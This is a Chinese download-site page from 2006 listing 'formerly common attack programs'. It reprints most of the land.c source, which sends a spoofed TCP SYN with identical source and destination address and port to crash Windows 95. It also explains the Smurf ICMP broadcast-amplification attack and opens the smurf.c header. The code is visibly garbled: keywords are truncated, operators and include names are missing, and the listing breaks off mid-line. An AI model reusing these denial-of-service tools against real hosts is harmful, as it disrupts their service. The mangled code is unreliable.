以前常用的攻击软件源代码编程实例关键词:以前常用,攻击软件源代码

教程(视频,书籍)下载: ASP.NET AutoCAD 数据库 C# ASP java photoshop 网页设计 delphi 3dmax Flash C++ VB 张孝祥实例更多请进入BIBIDU搜索

IT搜索引擎

常用攻击程序

Absact
这里有一些是老的，现在看来并没有用，但他们都很有名。

1 Land

攻击一台Win95的机器。这是Win95的一个漏洞，以其IP地址和端口向自
己的同一个端口发起连接（发SYN），Win95即会崩溃。

/* land.c by m3lt, FLC
crashes a win95 box */

#include
#include
#include .h>
#include
#include
#include
#include
#include

//用于TCP校验和的伪头
suct pseudohdr
{
suct in_addr saddr;
suct in_addr daddr;
u_char zero;
u_char protocol;
u_short length;
suct tcphdr tcpheader;
};

//计算IP校验和
u_short checksum(u_short * data,u_short length)
{
register long value;
u_short i;

for(i=0;i<(length>>1);i )
value =data[i];

if((length&1)==1)
value =(data[i]<<8);

value=(value&65535) (value>>16);

return(~value);
}

int main(int argc,char * * argv)
{
suct sockaddr_in sin;
suct hostent * hoste;
int sock;
char buffer[40];
suct iphdr * ipheader=(suct iphdr *) buffer;
suct tcphdr * tcpheader=(suct tcphdr *) (buffer sizeof(suct iphdr));
suct pseudohdr pseudoheader;

fprintf(serr,"land.c by m3lt, FLC\n");

if(argc<3)
{
fprintf(serr,"usage: %s IP port\n",argv[0]);
return(-1);
}

bzero(&sin,sizeof(suct sockaddr_in));
sin.sin_family=AF_INET;

if((hoste=gethostbyname(argv[1]))!=NULL)
bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length);
else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
{
fprintf(serr,"unknown host %s\n",argv[1]);
return(-1);
}

if((sin.sin_port=htons(atoi(argv[2])))==0)
{
fprintf(serr,"unknown port %s\n",argv[2]);
return(-1);
}

//new一个SOCK—RAW以发伪造IP包这需要root权限
if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
{
fprintf(serr,"couldn't allocate raw socket\n");
return(-1);
}

bzero(&buffer,sizeof(suct iphdr) sizeof(suct tcphdr));
ipheader->version=4;
ipheader->ihl=sizeof(suct iphdr)/4;
ipheader->tot_len=htons(sizeof(suct iphdr) sizeof(suct tcphdr));
ipheader->id=htons(0xF1C);
ipheader->ttl=255;
ipheader->protocol=IP_TCP;

//目的IP地址和源IP地址相同
ipheader->saddr=sin.sin_addr.s_addr;
ipheader->daddr=sin.sin_addr.s_addr;

//目的TCP端口和源TCPIP端口相同
tcpheader->th_sport=sin.sin_port;
tcpheader->th_dport=sin.sin_port;
tcpheader->th_seq=htonl(0xF1C);
tcpheader->th_flags=TH_SYN;
tcpheader->th_off=sizeof(suct tcphdr)/4;
tcpheader->th_win=htons(2048);

bzero(&pseudoheader,12 sizeof(suct tcphdr));
pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.protocol=6;
pseudoheader.length=htons(sizeof(suct tcphdr));
bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(suct tcphdr));
tcpheader->th_sum=checksum((u_short *) &pseudoheader,12 sizeof(suct tcphdr));

if(sendto(sock,buffer,sizeof(suct iphdr) sizeof(suct tcphdr),
0,(suct sockaddr *) &sin,sizeof(suct sockaddr_in))==-1)
{
fprintf(serr,"couldn't send packet\n");
return(-1);
}

fprintf(serr,"%s:%s landed\n",argv[1],

2 Smurf
smurf攻击是很简单的，它有一些IP（广播地址）地址列表，发出了一些伪造的数
据包（ICMP echo request）从而导致一场广播风暴，可以使受害主机（使它成为伪造包
的源地址）崩溃。

受害者有两种：中间的设备（bounce sites /data/switch/交换机或路由器）和被伪装的IP（那些
icmp echo的包都被发给它）。这种攻击依赖于路由器把一个广播地址转化为一广播桢
（如Ethernet, FF:FF:FF:FF:FF:FF），RFC中允许这种转换，但在今天看来是不需要的。

可以使你router停止转换第三层的广播（IP）到第二层的广播（Ethernet）。

但是Smb服务器或NT需要远程广播使LAN知道它的存在，但在路由器的上述配置会使这变
成不可能（没有WINS服务器时）。

/*
*
* $Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $
*
* spoofs icmp packets from a host to various broadcast addresses resulting
* in multiple replies to that host from a single packet.
*
* mad head t
* nyt, soldier, autopsy, legendnet, #c0de, irq for being my guinea pig,
* MissSatan for swallowing, napster for pimping my sister, the guy that
* invented vaseline, fyber for ying, knowy, old school #havok, kain
* cos he rox my sox, zuez, toxik, robocod, and everyone else that i might

来源:十度教育
作者:
关键字：以前常用,攻击软件源代码
发表日期：2006-6-11 2:06:30

PHOTOSHOP CS9.0中文版	MAYA 8.5 FOR WINDOWS	Corel Painter v9.0	Flash MX2004 中文版	Illustrator cs2 中文版
VC++6.0含sp6 中英文版	VB6.0 +sp6 简体中文版	Borland Delphi 7汉化版	MSDN for vb6.0中文版	Visual Studio 2005简体
教程中国下属文件存储共享专家BIBIDU.COM 提供大型软件，教材，源码，电影，音乐，图书等下载更多精品请点此进入